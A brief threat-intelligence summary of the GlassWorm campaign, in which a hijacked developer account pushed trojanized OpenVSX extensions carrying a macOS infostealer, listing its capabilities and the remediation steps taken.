GlassWorm was distributed by attackers who compromised the oorzc developer account and pushed malicious updates to four OpenVSX extensions with some 22,000 downloads. The macOS-focused infostealer harvests passwords, crypto-wallet data, browser and keychain secrets, and developer credentials, establishes persistence via a LaunchAgent, and exfiltrates data to an attacker-controlled server. #GlassWorm #OpenVSX
Keypoints
- Attackers hijacked the oorzc developer account to publish trojanized updates to four OpenVSX extensions.
- The campaign targeted macOS systems and has infected extensions downloaded approximately 22,000 times.
- GlassWorm steals passwords, crypto-wallet data, browser cookies, Apple Keychain items, Apple Notes, developer secrets, and local documents.
- The malware achieves persistence via a LaunchAgent, supports VNC and SOCKS proxying, and retrieves instructions from Solana transaction memos.
- OpenVSX/Eclipse revoked access and removed the malicious releases; affected developers should fully clean systems and rotate all secrets.